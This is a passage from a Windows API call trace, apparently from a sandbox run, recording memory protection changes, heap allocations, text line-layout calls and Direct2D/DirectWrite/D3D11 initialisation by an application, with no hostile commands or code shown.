lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.407] GetProcAddress (hModule=0x65d00000, lpProcName=0x42) returned 0x65d112b0 [0133.407] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f0fc | out: lpflOldProtect=0x19f0fc*=0x4) returned 1 [0133.407] LsGetHihLsimethods () returned 0x0 [0133.407] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.408] GetProcAddress (hModule=0x65d00000, lpProcName=0x3d) returned 0x65d05650 [0133.408] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f0fc | out: lpflOldProtect=0x19f0fc*=0x4) returned 1 [0133.408] LsGetWarichuLsimethods () returned 0x0 [0133.409] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.409] GetProcAddress (hModule=0x65d00000, lpProcName=0x47) returned 0x65d05530 [0133.409] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f0fc | out: lpflOldProtect=0x19f0fc*=0x4) returned 1 [0133.410] LsGetReverseLsimethods () returned 0x0 [0133.410] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.410] GetProcAddress (hModule=0x65d00000, lpProcName=0x1) returned 0x65d0d890 [0133.410] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f100 | out: lpflOldProtect=0x19f100*=0x4) returned 1 [0133.411] LsCreateContext () returned 0x0 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x647bc0 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6377c8 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x648238 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6377f8 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x648350 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x610728 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x610908 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6060f8 [0133.411] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x60a970 [0133.449] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x610868 [0133.449] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6106b0 [0133.449] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x610930 [0133.449] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x610750 [0133.449] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x648640 [0133.449] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.450] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.450] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.450] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.450] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x648a48 [0133.450] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x648b78 [0133.450] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x648ca0 [0133.450] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x648db0 [0133.451] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x648ee8 [0133.451] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x649cf0 [0133.451] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x643e80 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x649000 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x5f0b80 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x649f70 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x615730 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x64a068 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x643c10 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x64a208 [0133.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x64a3a0 [0133.452] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.453] GetProcAddress (hModule=0x65d00000, lpProcName=0x31) returned 0x65d0e580 [0133.453] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f0f0 | out: lpflOldProtect=0x19f0f0*=0x4) returned 1 [0133.454] LsSetModWidthPairs () returned 0x0 [0133.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f6a08 [0133.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x62a650 [0133.454] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.454] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.454] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.454] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.455] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.455] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.455] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.456] GetProcAddress (hModule=0x65d00000, lpProcName=0x34) returned 0x65d0e810 [0133.456] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19eef8 | out: lpflOldProtect=0x19eef8*=0x4) returned 1 [0133.456] LsSetBreaking () returned 0x0 [0133.456] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x64a4b0 [0133.456] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f720 [0133.456] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.457] GetProcAddress (hModule=0x65d00000, lpProcName=0x30) returned 0x65d0e330 [0133.457] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ef10 | out: lpflOldProtect=0x19ef10*=0x4) returned 1 [0133.457] LsSetDoc () returned 0x0 [0133.458] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.458] GetProcAddress (hModule=0x65d00000, lpProcName=0x3) returned 0x65d09060 [0133.458] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19eef8 | out: lpflOldProtect=0x19eef8*=0x4) returned 1 [0133.459] LsCreateLine () returned 0x0 [0133.460] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.460] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.460] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x114) returned 0x64a730 [0133.461] WTSGetActiveConsoleSessionId () returned 0x1 [0133.461] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.461] RtlInitializeConditionVariable () returned 0xd4c298 [0133.461] RtlInitializeConditionVariable () returned 0xd4c2c8 [0133.461] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.462] LoadLibraryExA (lpLibFileName="d2d1.dll", hFile=0x0, dwFlags=0x0) returned 0x6d0c0000 [0133.477] GetProcAddress (hModule=0x6d0c0000, lpProcName=0x1) returned 0x6d433600 [0133.477] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e460 | out: lpflOldProtect=0x19e460*=0x4) returned 1 [0133.477] D2D1CreateFactory () returned 0x0 [0133.481] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.482] LoadLibraryExA (lpLibFileName="DWrite.dll", hFile=0x0, dwFlags=0x0) returned 0x6cec0000 [0133.530] GetProcAddress (hModule=0x6cec0000, lpProcName="DWriteCreateFactory") returned 0x6cf3e750 [0133.531] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e464 | out: lpflOldProtect=0x19e464*=0x4) returned 1 [0133.531] DWriteCreateFactory () returned 0x0 [0133.533] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.534] GetProcAddress (hModule=0x71e90000, lpProcName="CreateDXGIFactory1") returned 0x71e9fce0 [0133.534] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e498 | out: lpflOldProtect=0x19e498*=0x4) returned 1 [0133.534] CreateDXGIFactory1 () returned 0x0 [0133.535] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0133.536] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.537] LoadLibraryExA (lpLibFileName="d3d11.dll", hFile=0x0, dwFlags=0x0) returned 0x720d0000 [0133.537] GetProcAddress (hModule=0x720d0000, lpProcName="D3D11CreateDevice") returned 0x721479a0 [0133.538] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e220 | out: lpflOldProtect=0x19e220*=0x4) returned 1 [0133.538] D3D11CreateDevice () returned 0x0 [0133.599] WTSGetActiveConsoleSessionId () returned 0x1 [0133.599] _vsnwprintf (in: _Buffer=0x19e020, _BufferCount=0x18f, _Format="vendorId=\"0x%x\",deviceID=\"0x%x\",subSysID=\"0x%x\",revision=\"0x%x\",version=\"%d.%d.%d.%d\"hypervisor=\"%s (%s)\"", _ArgList=0x19dcc4 | out: _Buffer="vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.10586.0\"hypervisor=\"No Hypervisor (No SLAT)\"") returned 122 [0133.600] wcsncmp (_String1="vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.10586.0\"hypervisor=\"Hypervisor detected (No SLAT)\"", _String2="vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.10586.0\"hypervisor=\"No Hypervisor (No SLAT)\"", _MaxCount=0x190) returned -6 [0133.601] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.661] GetACP () returned 0x4e4 [0133.661] _ultow_s (in: _Value=0x4e4, _Buffer=0x19e576, _BufferCount=0xb, _Radix=10 | out: _Buffer="1252") returned 0x0 [0133.661] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="EUDC\\1252", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e568 | out: phkResult=0x19e568*=0x0) returned 0x2 [0133.683] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.683] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.683] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.684] GetProcAddress (hModule=0x65d00000, lpProcName=0x2c) returned 0x65d03720 [0133.684] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f038 | out: lpflOldProtect=0x19f038*=0x4) returned 1 [0133.684] LsQueryLineDup () returned 0x0 [0133.685] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.685] GetProcAddress (hModule=0x65d00000, lpProcName=0x5) returned 0x65d017d0 [0133.685] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f14c | out: lpflOldProtect=0x19f14c*=0x4) returned 1 [0133.686] LsDestroyLine () returned 0x0 [0133.686] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.686] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.686] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.686] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.686] LsSetDoc () returned 0x0 [0133.686] LsCreateLine () [0133.687] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x643e80, Size=0x12c) returned 0x686078 [0133.687] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x643c10, Size=0x12c) returned 0x6861b0 [0133.687] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649000, Size=0x258) returned 0x6862e8 [0133.687] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x64a208, Size=0x258) returned 0x686548 [0133.739] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x190) returned 0x64a208 [0133.739] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6861b0, Size=0x190) returned 0x649000 [0133.739] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6862e8, Size=0x320) returned 0x6867a8 [0133.739] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686548, Size=0x320) returned 0x686078 [0133.750] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x64a208, Size=0x1f4) returned 0x6863a0 [0133.750] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649000, Size=0x1f4) returned 0x6865a0 [0133.750] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6867a8, Size=0x3e8) returned 0x6867a8 [0133.750] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x3e8) returned 0x686b98 [0133.794] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6863a0, Size=0x258) returned 0x686078 [0133.794] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6865a0, Size=0x258) returned 0x6862d8 [0133.794] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6867a8, Size=0x4b0) returned 0x686f88 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686b98, Size=0x4b0) returned 0x686538 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x2bc) returned 0x6869f0 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6862d8, Size=0x2bc) returned 0x686cb8 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686f88, Size=0x578) returned 0x686f88 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686538, Size=0x578) returned 0x687508 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6869f0, Size=0x320) returned 0x687a88 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686cb8, Size=0x320) returned 0x686078 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686f88, Size=0x640) returned 0x6863a0 [0133.795] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687508, Size=0x640) returned 0x6869e8 [0133.807] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687a88, Size=0x384) returned 0x687a88 [0133.807] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x384) returned 0x687030 [0133.807] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6863a0, Size=0x708) returned 0x687e18 [0133.808] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6869e8, Size=0x708) returned 0x686078 [0133.808] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687a88, Size=0x3e8) returned 0x6873c0 [0133.808] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687030, Size=0x3e8) returned 0x6877b0 [0133.808] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687e18, Size=0x7d0) returned 0x687e18 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x7d0) returned 0x686078 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6873c0, Size=0x44c) returned 0x6885f0 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6877b0, Size=0x44c) returned 0x6877b0 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687e18, Size=0x898) returned 0x686850 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x898) returned 0x687c08 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6885f0, Size=0x4b0) returned 0x6885f0 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6877b0, Size=0x4b0) returned 0x688aa8 [0133.809] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686850, Size=0x960) returned 0x686850 [0133.810] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687c08, Size=0x960) returned 0x687c08 [0133.810] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6885f0, Size=0x514) returned 0x686078 [0133.810] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688aa8, Size=0x514) returned 0x688aa8 [0133.810] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686850, Size=0xa28) returned 0x686850 [0133.810] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687c08, Size=0xa28) returned 0x687c08 [0133.822] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x578) returned 0x686078 [0133.822] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688aa8, Size=0x578) returned 0x687280 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686850, Size=0xaf0) returned 0x688638 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687c08, Size=0xaf0) returned 0x6865f8 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x5dc) returned 0x687800 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687280, Size=0x5dc) returned 0x687de8 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688638, Size=0xbb8) returned 0x688638 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6865f8, Size=0xbb8) returned 0x6865f8 [0133.823] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687800, Size=0x640) returned 0x6871b8 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687de8, Size=0x640) returned 0x687de8 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688638, Size=0xc80) returned 0x688638 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6865f8, Size=0xc80) returned 0x6892c0 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6871b8, Size=0x6a4) returned 0x6871b8 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687de8, Size=0x6a4) returned 0x687de8 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688638, Size=0xd48) returned 0x686078 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6892c0, Size=0xd48) returned 0x688498 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6871b8, Size=0x708) returned 0x6871b8 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687de8, Size=0x708) returned 0x6891e8 [0133.824] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xe10) returned 0x686078 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688498, Size=0xe10) returned 0x6898f8 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6871b8, Size=0x76c) returned 0x6871b8 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6891e8, Size=0x76c) returned 0x68a710 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xed8) returned 0x686078 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6898f8, Size=0xed8) returned 0x687930 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6871b8, Size=0x7d0) returned 0x688810 [0133.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a710, Size=0x7d0) returned 0x68a710 [0133.826] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xfa0) returned 0x686078 [0133.826] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x687930, Size=0xfa0) returned 0x688fe8 [0133.880] LsDestroyLine () returned 0x0 [0133.880] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.880] LsSetDoc () returned 0x0 [0133.880] LsCreateLine () returned 0x0 [0133.881] LsQueryLineDup () returned 0x0 [0133.881] LsDestroyLine () returned 0x0 [0133.881] memcpy_s (in: _Destination=0x19e550, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x19e550) returned 0x0 [0133.881] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.881] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.881] malloc (_Size=0xb4) returned 0xc5aec8 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.882] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.888] GetFocus () returned 0x103ba [0133.888] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.888] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.889] GetFocus () returned 0x103ba [0133.889] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f6e0 | out: lpPoint=0x19f6e0) returned 1 [0133.889] GetCapture () returned 0x0 [0133.890] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.890] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.890] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.890] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.890] memcpy_s (in: _Destination=0xcfa400, _DestinationSize=0x10, _Source=0x19f1c0, _SourceSize=0x10 | out: _Destination=0xcfa400) returned 0x0 [0133.891] GetCurrentThreadId () returned 0xb48 [0133.891] GetCurrentThreadId () returned 0xb48 [0133.891] GetCurrentThreadId () returned 0xb48 [0133.891] GetFocus () returned 0x103ba [0133.891] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f6e0 | out: lpPoint=0x19f6e0) returned 1 [0133.891] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.892] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.892] memcpy_s (in: _Destination=0xcfa410, _DestinationSize=0x10, _Source=0x19f1c0, _SourceSize=0x10 | out: _Destination=0xcfa410) returned 0x0 [0133.892] GetCurrentThreadId () returned 0xb48 [0133.892] GetCurrentThreadId () returned 0xb48 [0133.892] GetCurrentThreadId () returned 0xb48 [0133.893] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.893] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f6e0 | out: lpPoint=0x19f6e0) returned 1 [0133.893] GetCapture () returned 0x0 [0133.894] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.894] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.894] memcpy_s (in: _Destination=0xcfa420, _DestinationSize=0x10, _Source=0x19f1c0, _SourceSize=0x10 | out: _Destination=0xcfa420) returned 0x0 [0133.894] GetCurrentThreadId () returned 0xb48 [0133.895] GetCurrentThreadId () returned 0xb48 [0133.895] GetCurrentThreadId () returned 0xb48 [0133.895] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f6e0 | out: lpPoint=0x19f6e0) returned 1 [0133.895] GetCapture () returned 0x0 [0133.895] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.895] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.895] memcpy_s (in: _Destination=0xcfa430, _DestinationSize=0x10, _Source=0x19f1c0, _SourceSize=0x10 | out: _Destination=0xcfa430) returned 0x0 [0133.896] GetCurrentThreadId () returned 0xb48 [0133.896] GetCurrentThreadId () returned 0xb48 [0133.896] GetCurrentThreadId () returned 0xb48 [0133.899] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f6e0 | out: lpPoint=0x19f6e0) returned 1 [0133.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.899] memcpy_s (in: _Destination=0xcfa440, _DestinationSize=0x10, _Source=0x19f1c0, _SourceSize=0x10 | out: _Destination=0xcfa440) returned 0x0 [0133.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.901] GetCurrentThreadId () returned 0xb48 [0133.901] GetCurrentThreadId () returned 0xb48 [0133.901] GetCurrentThreadId () returned 0xb48 [0133.901] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f6e0 | out: lpPoint=0x19f6e0) returned 1 [0133.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.902] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.902] memcpy_s (in: _Destination=0xcfa450, _DestinationSize=0x10, _Source=0x19f1c0, _SourceSize=0x10 | out: _Destination=0xcfa450) returned 0x0 [0133.902] GetCurrentThreadId 